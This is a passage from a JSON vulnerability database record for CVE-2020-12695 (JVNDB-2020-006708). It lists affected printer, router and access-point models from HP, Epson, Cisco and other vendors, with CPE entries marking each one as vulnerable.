"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "dvg-n5412sp",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "5034 z4a74a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 6200 k7g26b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "officejet 4656 k9v81b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5540 f2e72a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4503 e6g71b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 4518",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 100 cn517a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5000 m2u91a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5543 n9u88a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 7644 e4w46a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 6200 y0k15a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "adsl",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": null
},
{
"model": "envy 6052 5se18a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7100 z3m37a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 3548 a9t81b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5000 z4a74a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4522 f0v67a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 4535 f0v64b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 100 cn519a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4520 f0v63b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7155 z3m52a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 6200 k7g18a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 114 cq811b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5664 f8b08a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "hg532e",
"scope": "eq",
"trust": 1.0,
"vendor": "huawei",
"version": null
},
{
"model": "envy 4523 j6u60b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "amg1202-t10b",
"scope": "eq",
"trust": 1.0,
"vendor": "zyxel",
"version": null
},
{
"model": "envy 5020 m2u91b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 110 cq809b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7800 k7s00a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5542 k7c88a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "officejet 4657 v6d29b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "hg255s",
"scope": "eq",
"trust": 1.0,
"vendor": "huawei",
"version": null
},
{
"model": "envy 4500 a9t80b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4521 k9t10b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 4515",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 4675 f1h97b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7164 k7g99a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5540 g0v52a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4512 k9h49a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-320",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "envy 6020 5se17a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-2101",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "envy 100 cn517b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-241",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "deskjet ink advantage 3456 a9t84c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4500 d3p93a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "5030 z4a70a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 100 cn517c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5540 g0v53a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "wap351",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "envy 5534",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "5660 f8b04a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-620",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "deskjet ink advantage 3545 a9t81c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4520 f0v69a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4501 c8d05a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5535",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 6222 y0k14d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4511 k9h50a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "ep-101",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "deskjet ink advantage 4675 f1h97a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5642 b9s64a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "zxv10 w300",
"scope": "eq",
"trust": 1.0,
"vendor": "zte",
"version": null
},
{
"model": "envy 5540 g0v47a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4500 a9t89a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4509 d3p94b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5539",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7800 y0g52b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 3545 a9t83b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "officejet 4650 e6g87a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7120 z3m41d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 4676 f1h98a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4524 f0v72b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 120 cz022a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 110 cq809d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "wr8165n",
"scope": "eq",
"trust": 1.0,
"vendor": "nec",
"version": null
},
{
"model": "envy 110 cq812c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 5575 g0v48b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "officejet 4655 k9v79a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "officejet 4654 f1j06b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 120 cz022b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "wap150",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "envy 5640 b9s56a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4504 a9t88b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-330",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "envy pro 6420 6wd16a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4520 f0v63a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4526 k9t05b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "officejet 4650 f1h96a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4502 a9t87b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "officejet 4650 f1h96b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy pro 6455 5se45a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7822 y0g43d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-4105",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "selphy cp1200",
"scope": "eq",
"trust": 1.0,
"vendor": "canon",
"version": null
},
{
"model": "xp-100",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "envy 5643 b9s63a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 4535 f0v64a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "officejet 4655 f1j00a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 110 cq809a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"model": "archer c50",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "envy photo 6220 k7g20d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-8600",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "wnhde111",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "officejet 4654 f1j07b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-2105",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "envy 5531",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 6200 k7s21b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4524 k9t01a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "31"
},
{
"model": "envy 5544 k7c93a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "hostapd",
"scope": "lt",
"trust": 1.0,
"vendor": "w1 fi",
"version": "2.0.0"
},
{
"model": "officejet 4655 k9v82b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-340",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"model": "envy 4524 f0v71b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7100 3xd89a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4528 k9t08b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5530",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-440",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "envy photo 6200 y0k13d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 6230 k7g25b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 114 cq812a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 4536 f0v65a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4502 a9t85a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5548 k7g87a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "ew-m970a3t",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "envy 5000 m2u94b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 6020 6wd35a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "officejet 4658 v6d30b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 100 cn519b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "rt-n11",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": null
},
{
"model": "deskjet ink advantage 3546 a9t82a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4513 k9h51a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 6020 7cz37a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 6220 k7g21b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5000 m2u91a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": "*"
},
{
"model": "vmg8324-b10a",
"scope": "eq",
"trust": 1.0,
"vendor": "zyxel",
"version": null
},
{
"model": "unifi controller",
"scope": "eq",
"trust": 1.0,
"vendor": "ui",
"version": null
},
{
"model": "xp-4100",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "deskjet ink advantage 5575 g0v48c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5546 k7c90a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5644 b9s65a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "20.04"
},
{
"model": "envy 6020 5se16b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7800 k7s10d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5547 j6u64a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7800 y0g42d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4520 e6g67a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5540 g0v51a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "zonedirector 1200",
"scope": "eq",
"trust": 1.0,
"vendor": "ruckussecurity",
"version": null
},
{
"model": "envy 5000 z4a54a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "b1165nfw",
"scope": "eq",
"trust": 1.0,
"vendor": "dell",
"version": null
},
{
"model": "deskjet ink advantage 4678 f1h99b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5000 m2u85b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy pro 6420 6wd14a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xbox one",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "10.0.19041.2494"
},
{
"model": "envy 5532",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4504 c8d04a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5544 k7c89a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-970",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "envy photo 7830 y0g50b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5640 b9s58a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "wap131",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "xp-8500",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "5030 m2u92b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 4535 f0v64c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4509 d3p94a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5536",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5665 f8b06a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5000 m2u85a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 100 cn518a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5540 k7c85a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-630",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "envy 5545 g0v50a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7100 k7g99a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 114 cq811a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "m571t",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "envy pro 6420 5se46a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7822 y0g42d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 6252 k7g22a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4527 j6u61b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "rt-n11",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "adsl",
"scope": null,
"trust": 0.8,
"vendor": "broadcom",
"version": null
},
{
"model": "dvg-n5412sp",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "unifi controller",
"scope": null,
"trust": 0.8,
"vendor": "ubiquiti",
"version": null
},
{
"model": "hostapd",
"scope": null,
"trust": 0.8,
"vendor": "w1 fi",
"version": null
},
{
"model": "selphy cp1200",
"scope": null,
"trust": 0.8,
"vendor": "canon",
"version": null
},
{
"model": "wap131",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "wap150",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "wap351",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "b1165nfw",
"scope": null,
"trust": 0.8,
"vendor": "dell",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-006708"
},
{
"db": "NVD",
"id": "CVE-2020-12695"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:ui:unifi_controller:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:w1.fi:hostapd:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.0.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:asus:rt-n11:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:broadcom:adsl:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:canon:selphy_cp1200:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:cisco:wap150:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:cisco:wap351:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:cisco:wap131:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dvg-n5412sp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dell:b1165nfw:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:epson:ew-m970a3t:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:ep-101:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-8500:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-702:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-340:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-620:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-320:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-960:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-2101:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-330:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-2105:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-630:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-8600:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-4105:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-241:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-4100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-970:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-440:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:m571t:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5000_m2u85a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5000_m2u85b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5000_m2u91a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5000_m2u94b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5000_z4a54a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5000_z4a74a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6200_k7g18a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6200_k7g26b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6200_k7s21b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6200_y0k13d_:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6200_y0k15a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7100_3xd89a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7100_k7g93a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7100_k7g99a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7100_z3m37a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7100_z3m52a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7800_k7r96a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7800_k7s00a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7800_k7s10d:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7800_y0g42d:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7800_y0g52b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5020_m2u91b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_114_cq811a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_114_cq811b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
